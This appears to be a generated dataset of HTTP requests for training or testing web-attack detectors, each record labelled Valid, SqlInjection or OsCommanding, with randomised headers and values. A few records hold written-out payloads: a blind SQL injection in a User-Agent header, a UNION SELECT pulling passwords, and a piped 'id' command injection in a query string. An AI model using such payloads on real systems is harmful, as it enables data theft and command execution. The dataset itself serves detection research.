~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41578
Start - Id: 11638
class: Valid
GET /iSXoylruihBY/Ffl/uyI1FmaNSG_5LAgH5/acrRjheet/ab4rp1c/N-CZS/rifeb.sh?utfgass5ecb=1&deoyont6seetld=enjr%3Edb%28atHinsertObn&mshOtmtr=nQPc&tlheTnEAehrnall=iot6eh%40teeetperl&Tnnomoldt=4238924&tti2etg0eZpm=on&lnCiic=dY&TpasswdpOzscript=a3FlZx HTTP/1.1
Host: 243.168.96.190
Connection: close
Accept: audio/*, text/xml;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: lO4i-Dqehjyac;q=0.8, aN-uteat;q=0.6, akinba-nqee2d;q=0.1, wastiihu-rw2dbsfT;q=0.6
Cache-Control: e=eoo
Client-ip: 208.124.245.65
Cookie: dtMrpcaoa=1
Cookie2: $Version="9"
Date: Thu, 04 Mar 04 16:34:07 GMT
ETag: W/"IymFYVmxtdQB5r@C"
Expect: hmnh=etdd1c;h5o5s=hHorsh
From: yspI@eunniwes.st
If-Modified-Since: Sun, 23 Sep 07 23:58:08 CET
If-Unmodified-Since: Wed, 01 Oct 08 14:31:56 GMT
If-Match: *
If-None-Match: "wKl_m-ZsJZvqysH"
If-Range: Wed, 04 Nov 09 03:21:43 UTC
Max-Forwards: 767
MIME-Version: 8.7
Pragma: a2nr='2uG'
Proxy-Authorization: Basic a3J2Y3RhWTpPZXR0YmQ=
Authorization: 6ncc wNIf=rils
Range: 65856-187
Referer: http://www.oQbe.de/hmtbwdt.gz
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.0 (X11; U; SunOS sun4u 9.1; ne-Ar; rv:3.6.9) Gecko/26322068
UA-CPU: 68000
UA-Disp: 3478,401,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3585x2586
Via: HTTP/1.2 128.20.23.226, HTTP/2.0 www.looaet.html, FTP/8.9 www.jncd.gif
Transfer-Encoding: deflate
Upgrade: evr/0.8, eendoi/2.0, ahl/7.0, tirUw/6.8
Warning: 857 www.weac.gif "Cdlyhd" 
X-Forwarded-For: 14.236.62.116
X-Serial-Number: 046539438868930
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11638
Start - Id: 27174
class: Valid
GET /.z2DFm8/d2qieHz/p1RLj.akfXD0njm.R/SqtmeRobNrd3iiarleg/2eemrE/r1uo08m6gxT_XLU.VI/iweDgodpF4p@t/ShAne/v11/e19jY-qZLEiipQ/tyhnr/kCGBZebF.jpeg? HTTP/1.1
Host: www.Eoullrsi.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: identity, deflate;q=0.1, identity, compress, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 30.130.235.21
Cookie: ds2hnetimLcae=/nmtmpE8csxmln%eenf1;vn4wthe=4
Cookie2: $Version="9"
Date: Wed, 07 Apr 10 06:18:35 CET
ETag: "G@QbMBly6v5UAVTgSi"
Expect: 100-continue
From: NnNme@unaivpat.ch
If-Modified-Since: Sun, 12 Jun 05 02:13:13 CET
If-Unmodified-Since: Sat, 01 Nov 08 22:50:07 GMT
If-Match: "TL9wcdfaej5MFfDvDYKZ"
If-None-Match: *
If-Range: Mon, 06 Sep 04 19:42:46 UTC
Max-Forwards: 9167
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: Digest nc=400a60cB
Range: 738-,-0
Referer: http://Gpyheaa.ch/tdoodO/xouha/liqveoea/srut/eenseaei.msf
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: paneeloe
UA-CPU: MIPS
UA-Disp: 924,199,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7267x9921
Via: 4.3 119.69.22.42:6193, FTP/4.9 246.111.229.190:266, HTTP/9.6 www.rwwehmaa.shtml
Transfer-Encoding: gzip
Upgrade: neae/3.6, fitz7t/2.1
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 437437535
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27174
Start - Id: 35449
class: SqlInjection
PUT /cot-RRLn2jBPWUZ/tLbvEhjC9CGRv8x_3wuL/pfmoeqeaaelbTezsd9/jIqltraiehcDulc/t7Y.ISCy/snnoruymi4ozpecarL.gif? HTTP/1.0
Content-Length: 88
Content-Encoding: identity
Content-Location: http://www.griSs5da.st/gIism/Austrhto/7ihdosei/Dioon.tiff
Content-MD5: b3dzNWRlaEluZmRkeEl3YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Jul 06 12:49:57 GMT
Host: 76.86.39.120:70
Connection: close
Accept: audio/x-wav, audio/x-wav;q=0.5
Accept-Charset: iso-8859-9;q=0.2, gb2312, x-mac-korean;q=0.9, windows-1255;q=0.9, cp-950;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: rgrs0-otrca, v9aehnh-enngmsu;q=0.3
Cookie: eDby6h2n0ri2=es;dpr;ailm=h.eGsRlP.;llctd=2162582;soihtRrSs8eiat=4387975475
Date: Wed, 27 Feb 08 21:39:49 CET
If-Modified-Since: Fri, 13 Jan 06 01:41:41 CET
Referer: /Ietoc/nnntnp/rbhrat0/baes0st/AojIn.mpg
TE: chunked;q=0.9
User-Agent: AND    ascii(lower(substring((SELECT  TOP 1 anseor    FROM     sysobject    WHERE    xtype = 'U'   ),1,1)))    > 111
Via: HTTP/7.2 www.sade.css, 6.6 46.230.109.76
Transfer-Encoding: eskmC

uL=t3F08S&ta2e=nonq&lohtk4t=o?&Ersux3un=51&hhphyg1HtDeu=eZJtIQ&amnraani2s4S=tfat0am9ee

End - Id: 35449
Start - Id: 8393
class: Valid
GET /105vDDn11z/xU8T7Pw/iideta7osmsn2plfh/d_XtREZm@U4E-Si.9/hHNJRw18mfFEdtF.htR/a6YKKYUYwL/s1rIyeVk-VFQTR3s.php?afq6H=44821923&trswnnsratoat=22996&ttI=mhavingd%27eu%25uuivinclude+b7r0&etNExtTmwl=kdb HTTP/1.0
Host: 20.104.72.49:5
Connection: keep-alive
Accept: text/*
Accept-Charset: x-mac-turkish, iso-8859-8;q=0.4, utf-7
Accept-Encoding: 
Accept-Language: ro-extd, 3mhwa-bson, en-a;q=0.4, roruguD-bIdlzu;q=0.9
Cache-Control: max-age=95288
Client-ip: 55.14.13.126
Cookie: 1AH5DNmf@Ndz=e6;atsoetimdRp5mno=Die3mfeltcfiuOusW;6yneAOtv=vdtibsdidaae;hnvequoOabtier=p4Em
Cookie2: $Version="05"
Date: Wed, 06 Jul 05 23:41:35 UTC
ETag: W/"yMsnma215J4vBEp"
Expect: itte2pI
From: eeqsa@nsrtpHttai.com
If-Modified-Since: Tue, 27 Nov 07 23:50:47 CET
If-Unmodified-Since: Tue, 27 Nov 07 17:14:14 CET
If-Match: "JTPOrohtoWdQ4Tsu"
If-None-Match: *
If-Range: Sat, 10 Mar 07 12:19:22 UTC
Max-Forwards: 8346
MIME-Version: 9.5
Pragma: LvoYhn=R
Proxy-Authorization: Basic ZGtjczplWWNuZHRmRA==
Authorization: a1tff cno1lhs=lieHhEc
Range: 994131-66069
Referer: /hfynt.jpeg
TE: trailers
Trailer: Warning
User-Agent: mefssoIiikn4n7e1Ei
UA-CPU: MIPS
UA-Disp: 755,5837,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 928x374
Via: 0.2 96.4.66.200:9, 6rhda7/9.2 www.csydael.shtml:5587, FTP/8.1 www.tRcbie.htm
Transfer-Encoding: gzip
Upgrade: xhecm/5.0, oee/5.2, kem/2.0, 9lan/4.8, sailrc/5.0
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 240.233.176.16
X-Serial-Number: 5442367838332838
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8393
Start - Id: 33776
class: Valid
POST /9J0a0akTpqgPw@T/g5.mdb? HTTP/1.0
Content-Length: 72
Content-Language: ieg2ler,no
Content-Encoding: compress
Content-Location: /E80veven/oew6ahd/dResr/Iuk7Usam.jsp
Content-MD5: bzBlaGRtbmVSZ25sZmlvNw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Jan 10 04:41:16 GMT
Last-Modified: Sat, 06 Sep 08 22:42:38 UTC
Host: www.Raoerc.gov:017
Connection: keep-alive
Accept: audio/x-wav, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: smOic-ncrtiaS;q=0.4
Cache-Control: no-store
Client-ip: 74.16.238.51
Cookie: rngaI5hpga5nat=5516342573
Cookie2: $Version="7"
Date: Tue, 18 Jul 06 15:20:27 GMT
ETag: W/"pO_@8EIcLHeEwG5"
Expect: 100-continue
From: hoHei@sTshLltba.st
If-Modified-Since: Tue, 28 Dec 04 09:38:24 UTC
If-Unmodified-Since: Wed, 06 Sep 06 05:13:35 UTC
If-Match: "KVCkeTbHY@vFMiq3v81"
If-None-Match: "8kO66Ykf-9yiSy@V"
If-Range: Wed, 23 Mar 05 04:24:49 UTC
Max-Forwards: 61
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: dnar oricoou=Orhtma
Authorization: Basic aURvczpndGk5bGo=
Range: 26855-,847-,-23
Referer: http://xciEd.cz/cisynrfm.jsp
TE: gzip;q=0.6
Trailer: If-Unmodified-Since
User-Agent: ntuS (a.HU1VEt)
UA-CPU: StrongARM
UA-Disp: 2862,4299,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 402x308
Via: 4.7 111.124.238.232, 0.5 www.mos3sAiT.gif
Transfer-Encoding: s3nm; pt6s=nopEaera
Upgrade: afdtp/0.2, msesl/6.4
Warning: 813 217.129.214.222 "datp" 
X-Forwarded-For: 146.218.100.181
X-Serial-Number: 425658
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8c=jNrpst8T'4&h3lO=4103&Luoh5RitoliRh2=i5gqt1r1&yascriptJfj.6=nTR1f6rw

End - Id: 33776
Start - Id: 19099
class: Valid
GET /rE.msf? HTTP/1.0
Host: 179.25.237.90
Connection: keep-alive
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.1, ks_c_5601-1987
Accept-Encoding: gzip;q=0.8
Accept-Language: *;q=0.0
Cache-Control: 3epcl=3e8
Client-ip: 150.199.45.231
Cookie: rtns=190575;ns2qs97alotSia=Zant39ptYdlianqY;qy9gir75m=Stebxf;gtn=1033025;fmych=tttlietgiESgnzs;qoHJa=cbRpsh1-rl iObwwinnt91h
Cookie2: $Version="47"
Date: Sun, 26 Jul 09 24:24:21 CET
ETag: W/"ybTiqqPUXJhv01KIDA9"
Expect: 100-continue
From: dvelvane@qhwetaoqup.st
If-Modified-Since: Fri, 10 Feb 06 09:34:50 GMT
If-Unmodified-Since: Mon, 09 Jul 07 12:08:58 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 17 Jan 08 03:48:20 CET
Max-Forwards: 6576
MIME-Version: 1.0
Pragma: tsf='cedes'
Proxy-Authorization: Basic M3A4M2EyOml0aHR0N2Nh
Authorization: Digest nonce
Range: 2-,-0,87927-654
Referer: http://www.DhalKh.de/aekrt8Sn.gif
TE: gzip;q=0.0,trailers,gzip;q=0.7
Trailer: Range
User-Agent: mOvgJNm http://www.pueh.st
UA-CPU: x86
UA-Disp: 2540,4307,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 315x9224
Via: 1.5 www.isel.gif, hwdesh/9.6 www.te4aachs.css
Transfer-Encoding: gzip
Upgrade: uh18/7.6, a1w/5.6, ydmr/7.2, o5j/2.9, rmIai/6.0
Warning: 947 www.RRed.htm "sieaizuOuewergir" "Sun, 14 Nov 04 07:40:45 UTC"
X-Forwarded-For: 31.76.137.109
X-Serial-Number: 548655567433466
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19099
Start - Id: 30391
class: Valid
GET /eugaa2aiclrbcL1qM/m4Nestpfhskeou/jhnn2e/w5-egVNhc6-wgocVBZO/dasyne7edndf7hehpbkz/seeeFrneh0dtigy/os_jDBZ@ZL2z./ibglyz37GS/4Pms.swf? HTTP/1.1
Host: www.y6ol.be
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-2
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 179.16.194.78
Cookie: nrntdf9fTy=e-yR0kREuj;9beOyNl=dcit;HLBAhz=ohd;A-from_=r
Cookie2: $Version="6"
Date: Thu, 26 Nov 09 22:21:08 CET
ETag: "hs3nAIXBY4HQpN@pDKq"
Expect: yaja=T6xO;bponex0
From: eonljol@h9iohse.fr
If-Modified-Since: Sat, 21 Nov 09 07:32:08 UTC
If-Unmodified-Since: Thu, 01 Jun 06 22:24:22 UTC
If-Match: "NBPFYA@8wn94ge8k8P"
If-None-Match: "FZ3-tDwQTBZP6qhuy"
If-Range: Thu, 19 Apr 07 04:05:28 CET
Max-Forwards: 7
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic NTZ0ZmRpOmlvbnJmZQ==
Authorization: Basic dWlsdGR0dHM6M2lhem9v
Range: -4
Referer: /Ogr7O.jpg
TE: deflate,chunked;q=0.3
Trailer: Max-Forwards
User-Agent: neyn/0.5.3.8.9
UA-CPU: 68000
UA-Disp: 178,649,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9503x4246
Via: 0.5 3.17.187.0, HTTP/9.7 50.4.191.202, FTP/6.1 102.201.244.117:39794
Transfer-Encoding: deflate
Upgrade: cla4n/8.3, fEa/7.5, uMYo/1.3, 8sc2/5.8
Warning: 906 www.li3ogeT.jpg "oo7NnrsaEitoagsnnip" "Wed, 04 Jul 07 09:26:22 UTC"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 157029836
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30391
Start - Id: 3092
class: Valid
GET /AMbZJ3childgrYD0autoexecyo/msb./h8ol6QnQpBkv8FBUB/.bj.js?pCuB_wu12rK=rasuen8duesca&1tn6mhme=47&hrsho1sr1cxvnta=yQ_WAIthsKI&2Eu1v7LKSzxtermhttp=663&ew9anEwn=00124276&e8orsehAl7=daulet%3D&iahraoiE=sqoeeoausrt%5Dtot HTTP/1.0
Host: www.nuiswr.org
Connection: keep-alive
Accept: audio/x-wav, audio/x-wav, audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: ei-slequr, esqeei7n-dwUh, g-oNi;q=0.2
Cache-Control: no-store
Client-ip: 194.13.56.125
Cookie: bteuAHtnteeetU8=i0A;dIew82imnvcsf=sNW;ddegrs19eitn=window.openftpc;ramiooeis8ni=330393;htlolsRtdrmi=676
Cookie2: $Version="32"
Date: Fri, 16 Oct 09 15:24:47 UTC
ETag: W/"uHGKV8CrIhA@9Y9gg4QB"
Expect: fonne=sb6Edoen
From: ssmefI@deee3y.biz
If-Modified-Since: Fri, 03 Jul 09 06:26:55 GMT
If-Unmodified-Since: Wed, 04 Aug 04 19:07:53 UTC
If-Match: "W9xO.U_sHoYx@fLmC5"
If-None-Match: "n5aDbb33S_FwWO9xW"
If-Range: "9v@zrsICwL9OsX8aK5pt"
Max-Forwards: 938
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest username="endc"
Authorization: Digest cnonce="ho7r"
Range: 09475-2,6992-
Referer: /0o4nne/Sn1sdts.asp
TE: gzip,deflate,deflate
Trailer: From
User-Agent: gdOaoyeqtttgOwdE
UA-CPU: MIPS
UA-Disp: 3610,5724,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3082x5034
Via: 9.8 98.192.179.92, 5.5 www.st9aal.html
Transfer-Encoding: deflate
Upgrade: ket/3.8, j3t/3.2
Warning: 690 25.36.240.58 "khpSxlij80Psteslo" "Tue, 28 Oct 08 11:10:05 CET"
X-Forwarded-For: 240.223.9.140
X-Serial-Number: 1257275939567339049
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3092
Start - Id: 32626
class: Valid
POST /CElibJCV5Klv.E1g7/eulq6/uersnltmigT1ndf0/tvM.Ia/tUq0/VRH0aUojhavingA/oEx1moahsufoan/gT/itwoMWDPb/onaopox/jzobjectf2nV4e/ua8es.nsf? HTTP/1.1
Content-Length: 179
Content-Language: suhzHs,miu,iole
Content-Encoding: identity
Content-Location: /owtslra/aoenhrci.wmn
Content-MD5: NnltbWs1Nm5pbmh5T0lzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Jun 07 22:47:05 UTC
Last-Modified: Sat, 22 Dec 07 01:27:28 GMT
Host: 112.83.95.218
Connection: edaghm
Accept: image/*;q=0.9, text/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: Of5e-9a, e-kel, hjoTwij-ltem, olcuic-o;q=0.0
Cache-Control: no-transform
Client-ip: 83.101.124.16
Cookie: thsciecs=q nes'qtahg;4TBu9= execdttowgr;nkT1J7O=91;tttOsrrdizHnioo= t+;fkh8u=adr
Cookie2: $Version="3"
Date: Fri, 23 Sep 05 15:58:39 UTC
ETag: "UqTI8FXDFGd0GcG3l"
Expect: dw7ie0
From: mhhvcrm@gtad.de
If-Modified-Since: Mon, 21 Aug 06 07:42:42 GMT
If-Unmodified-Since: Sun, 07 Jan 07 24:35:58 UTC
If-Match: "xvuSR6svjNda6jgc@"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 9.1
Pragma: owtgzwro=tdft
Proxy-Authorization: Digest username="tteg"
Authorization: NTLM b3RvZWl1b3NzYWxlaWNtYmVOZWZ3cmY5QW9hZE1sMkVkYW5p
Range: 0-468
Referer: /tfce/noet5N5y.nsf
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: ac5h78eic (rkB4Y6Wvn; wVRu29e7@; rhqsh7IT6; dPi0VLJx; ej-QAAhN)
UA-CPU: PowerPC
UA-Disp: 010,8436,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 853x924
Via: 0.5 www.aky5eg.js
Transfer-Encoding: gzip
Upgrade: Mit/0.5
Warning: 600 www.oeyQ.gif:6 "MqLrrRse4tmzoe" 
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 73155166220455300
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

hA=h&ePe=m/gvhavingehjihtacceshtpassit-s0doi&t6tBla= wgetnui&bsemIdnew8=dawliWhdnpofdexr&eeIepttwuso=603530064&hsirndxc6i=e)h7h+h&rn6dgaWszEhh=81791303&lUkdk=mvqrhRcahpgca5n

End - Id: 32626
Start - Id: 36759
class: OsCommanding
GET /iarczrlwhk/stdinHPusr/-9MO.znIi/eMtcuL10n/aNhpslimzaEdyc7ifAe/JaBET/yFnjijrao/heerdep/SUsock_streamVKWazp3ZjbPR/M53andlnGn4_.htm?5a=LRcood7eae&czr1rnLm8V=jnhulhttpsaglernBwe&o3attnledtfzh0j=%3Frdgrn5&tiirglnf5r=%7C++id+++%7C HTTP/1.1
Host: www.hetsgtn.com:80
Connection: 5neswc
Accept: audio/*;q=0.7, text/*;q=0.0, application/*
Accept-Charset: *
Accept-Encoding: identity, deflate, gzip;q=0.3, compress;q=0.4, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 130.81.190.203
Cookie: QPCSXmb25=t=aW;dtmoe=37CqSshutdownoyxo4m;qn=113926033
Cookie2: $Version="576"
Date: Sat, 07 Jan 06 12:47:17 UTC
ETag: W/"nq-5AohjOXHMiQfI"
Expect: 100-continue
From: 1Ruwies@Rllsdtnt.st
If-Modified-Since: Tue, 04 Nov 08 19:30:21 CET
If-Unmodified-Since: Sat, 28 Mar 09 10:17:41 CET
If-Match: "AcodqUqxsT1b9Y33"
If-None-Match: "HfjEhsKvvX7hEI24"
If-Range: "ljlX7WAzTSP.gtyEI"
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest response="49a2dbb09A077a8FDd2baA76dAA5E5dd"
Authorization: lciVir iy9s5osO=hgre
Range: 8-,6-50
Referer: http://a5ih8i.gov/sL0L/bsel/umrpuec/t6pj.tar.gz
TE: deflate,trailers,gzip;q=0.4
Trailer: Warning
User-Agent: Mozilla/5.5 (X11; U; Linux i386 2.8; ci-en; rv:1.4.3) Gecko/32807221
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 232x1783
Via: 6.1 215.249.75.54
Transfer-Encoding: deflate
Upgrade: ozdet9/9.7, Rir/6.3, t2nuis/3.2, OrehaH/2.4
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36759
Start - Id: 41511
class: SqlInjection
POST /dtssoeatmzailtD/AZMB6@6GAk7z/m1ndgpIsnIhook/bEohr/l7eetuiamnnop/rvodhl/ee5e/tlewoL/aCtF.RMihtacceszG-a/bnpn4mboawepdNgI/sImq.mdb? HTTP/1.1
Content-Length: 107
Content-Language: rG8aatle,eas,aa
Content-Encoding: compress
Content-Location: /gStns.asmx
Content-MD5: bWhvbW9udWhhbm5hd25xcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 23 Nov 09 17:26:35 CET
Last-Modified: Sun, 25 Sep 05 24:33:50 UTC
Host: www.yeeoFd5eeo.net
Connection: close
Accept: image/jpeg
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.3, gzip, compress, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 3.29.1.103
Cookie: h0tc=eemmeamf5md;esomlhIg3yleee=np_;dh=neHcPJto
Cookie2: $Version="3"
Date: Sun, 02 Sep 07 24:45:55 UTC
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Sat, 05 Apr 08 02:41:36 UTC
If-Unmodified-Since: Wed, 19 Dec 07 19:03:33 UTC
If-Match: *
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: "64dO49Kdaw1CfECuFP1"
Max-Forwards: 441
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic ZkkyNTpucm9z
Authorization: Basic OG05c2w6ZzNBa0x0
Range: 229-94,-0,-455
Referer: http://Guhuupt.com/rxvhbxo.jpeg
TE: gzip,chunked
Trailer: User-Agent
User-Agent: Mozilla/2.6 (compatible; uetreh; Windows NT; aoseasihlc)
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: HTTP/4.5 www.h2ji.jpeg
Transfer-Encoding: gzip
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tet='union  select   PASSWORD   from   DBA_PASSWORD;--&duisa5rrlto=e;iconnect&hLx=Uacbue/0httptnEed

End - Id: 41511
Start - Id: 39
class: Valid
GET /n8kYtyRQcd8c79y/WdjndcTa4ajrfeIoia/o3ttIsReHesdsom2R7/yuKVJzgum_o/mochaAkorFkIS.UN/dBQ6y@CjksxLf_acR@J/cyiuektrlbndedn/IV5ebdohHr6rYeoaa/pTd_43xhGzpM6qWa72O/2doX1Hdn-w.mspx? HTTP/1.0
Host: www.ls19ctosme.be:24
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesesimp, x-mac-icelandic;q=0.2, iso-8859-2, x-mac-chinesetrad
Accept-Encoding: compress;q=0.3, compress
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 156.145.165.171
Cookie: taddrOcxytsetD=803;ysoUeSi=94057
Cookie2: $Version="10"
Date: Wed, 18 Mar 09 15:27:26 CET
ETag: W/"txendMFnsxCj7AS8"
Expect: 100-continue
From: T11b@lathr.st
If-Modified-Since: Sun, 18 Feb 07 21:33:25 CET
If-Unmodified-Since: Sun, 09 Nov 08 22:24:40 GMT
If-Match: "@Af-u8gJq.Ffs@wlaS"
If-None-Match: *
If-Range: Sun, 23 Aug 09 10:31:31 UTC
Max-Forwards: 578
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="qbAila"
Authorization: mmujew itnl=lssehhr8
Range: -54670
Referer: http://www.0Elpos.cz/iol2rsi/ymNic7/bdRE3a/W0iesor/snhsaaa.jpeg
TE: gzip,trailers
Trailer: From
User-Agent: ydl9c (nSyI-bzQ; k2G4RvlV7)
UA-CPU: PowerPC
UA-Disp: 4994,968,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2292x8708
Via: 9.3 249.7.13.238
Transfer-Encoding: identity
Upgrade: ntyhts/3.8
Warning: 232 www.AlaosaP.html "peaiso" "Tue, 27 Oct 09 21:12:39 CET"
X-Forwarded-For: 242.13.127.96
X-Serial-Number: 436492
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39
Start - Id: 11821
class: Valid
GET /0rPC@usVwherelibq/g5_.Ard-If5u/pbwvRue4je2hmie1e0i/ePSGbZ/athnto4tehrsranxihe/a8H56gEcEX_MqbiPiO.tiff?rnt=Xs&zatl=gacdtr&idkNe=51787470&epNOz=hgR%40&qMg6nodek-N=+Eedattrd4e%5Cwinntrn9+r1&niao83adeib0yq=9&lacrn=udgern-&KFupdateFGmlogbJErcp=%2Fh&dntue=e%40g1mnO2r HTTP/1.0
Host: 10.221.18.107
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 54.230.57.109
Cookie: documentQrZnph-9fIo=thev;0btohiyrlssdmxT=o.ms1jKyXA;eUeef4=42283;Esyrh=e4Ny2dJ
Cookie2: $Version="863"
Date: Sat, 01 Mar 08 24:07:41 UTC
ETag: "m17lYPb@0k3@X_D"
Expect: 100-continue
From: ltia@luxm.fr
If-Modified-Since: Mon, 21 Nov 05 01:51:03 UTC
If-Unmodified-Since: Mon, 13 Aug 07 06:55:00 CET
If-Match: *
If-None-Match: "Lp92mcAq@zqdhgkoB0iR"
If-Range: *
Max-Forwards: 2271
MIME-Version: 9.7
Pragma: 2wS='hrmnn'
Proxy-Authorization: NTLM cndlYVQ0cmVvbnZyZWxyaW50dHRhaXJ0dGx2bnNhb21iaQ==
Authorization: Basic YXJ0RTpiMXkxYzFh
Range: 59-860239,22-,-9
Referer: http://www.eohee.cz/Te1Rio6l.bin
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: ioueosstwit1sset
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 045x0190
Via: 9.1 www.Dojlot.tiff, FTP/5.1 www.yola.js:4148
Transfer-Encoding: nasee; pho1Er=zLqid
Upgrade: ptl/3.8, ewttf/4.6, ywn/8.3
Warning: 125 www.knwtlae.shtml "ad0et9kU3d4n6SuMdtN" "Thu, 30 Sep 04 09:26:08 GMT"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 63208652767395
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 11821
Start - Id: 20701
class: Valid
GET /eUmS4oNzpMHvW/a5Aeh@NSkeval.swf?cakhatbiEth=qnobioyu8ytAngag&snttTlniiahuooe=v8Q59lZgQgpP&ceeloiTLobhtI=un+%5CddtTeentdry&adunDyceCMiio4=ch1+&34sNnWotzDsor=ual&nnecb=ct&yrrt4sow=y9vucomh%40Qp&@M9cVD=e8e&tvr=hefx&mI=aoastia0by92a46ij&n1ltwot=5E7mo&osbowTql=zANZ.9HtzlQs&taTdB=zsr+n HTTP/1.0
Host: www.tEaemnem.org:6462
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: utf-7, iso-8859-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2988
Client-ip: 128.50.24.52
Cookie: ntphu=bgsoundsvt6\;saeUrgr2wdkamo=4954056;egsnavSERco= s;diOh=97
Cookie2: $Version="49"
Date: Sat, 09 Oct 04 09:04:53 CET
ETag: W/"yF-ypC0B1-8uccz"
Expect: cgaczg=nthws
From: Eenieeb@jtsh.ch
If-Modified-Since: Mon, 29 May 06 11:39:15 CET
If-Unmodified-Since: Tue, 10 May 05 17:12:33 UTC
If-Match: "LjwBB8AX_5_UkdJYzC"
If-None-Match: *
If-Range: Mon, 09 Nov 09 19:52:09 UTC
Max-Forwards: 2
MIME-Version: 6.4
Pragma: 7di='hT'
Proxy-Authorization: Basic aE9Jbm06N2FOcmVlbg==
Authorization: Ttucw 9isle=Eawcinh
Range: 15-,71-,5-
Referer: /eyip/eeSnmzl/ii9tN/annnnlo.wmn
TE: chunked,deflate,chunked;q=0.9
Trailer: Accept-Charset
User-Agent: wFA_QFOYx http://www.EEhia8si.org
UA-CPU: Sparc
UA-Disp: 031,1343,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 413x553
Via: tie/3.4 www.rnpo3csi.jpeg, HTTP/7.3 91.128.62.19, nae/6.7 www.tvdia.jpeg:2094
Transfer-Encoding: identity
Upgrade: OtSal/2.6, ete/2.1, oHfg/3.7, dMshA/4.9, hnrpor/3.2
